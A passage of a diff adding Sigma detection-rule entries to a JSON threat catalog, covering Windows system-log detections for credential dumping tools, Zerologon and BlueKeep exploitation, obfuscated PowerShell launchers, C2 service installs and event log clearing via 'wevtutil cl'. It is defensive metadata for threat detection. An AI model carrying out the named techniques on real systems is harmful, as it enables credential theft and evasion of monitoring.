"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/21", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_hacktools.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "value": "Hacktool Service Registration or Execution" + }, + { + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "meta": { + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "creation_date": "2019/05/24", + "falsepositive": [ + "Bad connections or network interruptions" + ], + "filename": "win_system_rdp_potential_cve_2019_0708.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", + "value": "Potential RDP Exploit CVE-2019-0708" + }, + { + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "meta": { + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": "No established falsepositives", + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://www.secura.com/blog/zero-logon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + ], + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ] + }, + "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", + "value": "Zerologon Exploitation Using Well-known Tools" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_stdin_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - System" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "value": "Moriya Rootkit - System" + }, + { + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_mesh_agent.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "value": "Mesh Agent Service Installation" + }, + { + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_sliver.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "value": "Sliver C2 Default Service Installation" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "value": "Invoke-Obfuscation VAR+ Launcher - System" + }, + { + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_pdqdeploy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "value": "New PDQDeploy Service - Server Side" + }, + { + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Environments that use NTLMv1" + ], + "filename": "win_system_lsasrv_ntlmv1.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1550/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" + ], + "tags": [ + "attack.execution", + "attack.t1550.002", + "attack.s0363" + ] + }, + "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "value": "NTLMv1 Logon Between Client and Server" + }, + { + "description": "Detects service installation in suspicious folder appdata", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_folder.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "value": "Service Installation in Suspicious Folder" + }, + { + "description": "Detects application popup reporting a failure of the Sysmon service", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_application_sysmon_crash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "value": "Sysmon Crash" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" + }, + { + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_rtcore64_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "value": "RTCore Suspicious Service Installation" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_eventlog_cleared.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "value": "Eventlog Cleared" + }, + { + "description": "Detects NetSupport Manager service installation on the target system.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_netsupport_manager.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "value": "NetSupport Manager Service Install" + }, + { + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "meta": { + "author": "Ján Trenčanský, frack113", + "creation_date": "2020/07/28", + "falsepositive": [ + "Administrator actions", + "Auto updates of Windows Defender causes restarts" + ], + "filename": "win_system_defender_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", + "value": "Windows Defender Threat Detection Disabled - Service" + }, + { + "description": "Detects QuarksPwDump clearing access history in hive", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", + "value": "QuarksPwDump Clearing Access History" + }, + { + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_susp_proceshacker.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "value": "ProcessHacker Privilege Elevation" + }, + { + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/11/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_turla_service_png.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "value": "Turla PNG Dropper Service" + }, + { + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_ntfs_vuln_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1347958161609809921", + "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", + "https://twitter.com/jonasLyk/status/1347900440000811010", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.001" + ] + }, + "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "value": "NTFS Vulnerability Exploitation" + }, + { + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_carbonpaper_turla.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "value": "Turla Service Install" + }, + { + "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2022/05/17", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", + "value": "System Eventlog Cleared" + }, + { + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "meta": { + "author": "Dimitrios Slamaris, @atc_project (fix)", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_dhcp_config_failed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "value": "DHCP Server Error Failed Loading the CallOut DLL" + }, + { + "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "meta": { + "author": "Cybex", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e17692", + "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" + }, + { + "description": "Detects suspicious service installation scripts", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_script.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "value": "Suspicious Service Installation Script" + }, + { + "description": "Detects volume shadow copy mount via windows event log", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of volume shadow copy mounts (backups maybe)." + ], + "filename": "win_system_volume_shadow_copy_mount.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "f512acbf-e662-4903-843e-97ce4652b740", + "value": "Volume Shadow Copy Mount" + }, + { + "description": "Detects suspicious service installation commands", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "value": "Suspicious Service Installation" + }, + { + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_tacticalrmm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", + "value": "TacticalRMM Service Installation" + }, + { + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_stonedrill.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1543.003" + ] + }, + "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "value": "StoneDrill Service Install" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_system_mal_creddumper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "value": "Credential Dumping Tools Service Execution - System" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_system_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", + "value": "Tap Driver Installation" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_chafer_mar18_system.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "value": "Chafer Activity - System" + }, + { + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "meta": { + "author": "Sittikorn S, Tim Shelton", + "creation_date": "2022/05/11", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_krbrelayup_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", + "value": "KrbRelayUp Service Installation" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "value": "Invoke-Obfuscation Via Use MSHTA - System" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "value": "Invoke-Obfuscation Via Use Clip - System" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - System" + }, + { + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_lpe_indicators_tabtip.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 